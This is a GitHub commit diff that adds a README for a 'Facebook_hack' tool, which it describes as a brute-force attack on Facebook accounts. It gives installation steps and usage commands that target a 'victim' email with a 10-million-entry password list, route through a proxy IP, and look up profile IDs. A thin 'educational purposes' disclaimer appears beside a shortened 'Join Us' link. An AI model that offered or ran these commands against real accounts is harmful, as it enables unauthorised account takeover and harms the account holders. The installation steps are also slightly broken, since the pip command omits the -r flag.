File tree Expand file tree Collapse file tree 1 file changed +60
-1
lines changed Expand file tree Collapse file tree 1 file changed +60
-1
lines changed Original file line number Diff line number Diff line change 1
- # Facebook_hack
1
+ # Facebook_hack
2
+
3
+ ![ PicsArt_22-06-08_16-34-50-148] ( https://user-images.githubusercontent.com/70594016/172602116-20012d77-f4c2-45a6-a5fb-391f683c0f05.png )
4
+ ###### Powerfull Facebook Bruteforce Attack.
5
+ ***
6
+ ### <p align =" center " >Commands to run tool in ur terminal Termux && Kali Linux
7
+ ***
8
+
9
+ ``` bash
10
+ Note : Tool is Made of Educational Purposes only.
11
+ Please try not to harm anyone device
12
+ it' s For Fun Purpose Not For Revenge
13
+ (Join Us https://bit.ly/3PV3S3r)
14
+ ```
15
+ ## Language is used to Make this tool
16
+ - Python
17
+
18
+ ## The Tool is for :
19
+ - Windows
20
+ - Kali Linux
21
+ - Android~Termux
22
+ - macOs
23
+ - any Os has python(2.x, 3.x) with required modules
24
+
25
+ ###### Installation
26
+ ```bash
27
+ apt update && apt upgrade -y
28
+ ```
29
+ ```bash
30
+ apt install git -y
31
+ ```
32
+ ```bash
33
+ git clone https://github.com/hackerxphantom/Facebook_hack.git
34
+ ```
35
+ ```bash
36
+ cd Facebook_hack
37
+ ```
38
+ ```bash
39
+ pip install requirements.txt
40
+ ```
41
+ ```bash
42
+ python facebook_hack.py
43
+ ```
44
+
45
+ ## usage :-
46
+ - **U can Use Victim email Or Facebook Profile Id**:
47
+
48
+ - **Brute Force On Facebook Account Without proxy**:
49
+
50
+ * **Command**: python facebook_hack.py -t victim@gmail.com -w 10MPASS.txt
51
+
52
+ - **Brute Force On Facebook Account With Proxy**:
53
+
54
+ * **Command**: python facebook_hack.py -t victim@gmail.com -w 10MPASS.txt -p 144.217.101.245:3129
55
+
56
+ - **Get Target Facebook Profile ID**:
57
+
58
+
59
+ * **Command**: python facebook_hack.py -g https://www.facebook.com/zuck
60
+
You can’t perform that action at this time.
0 commit comments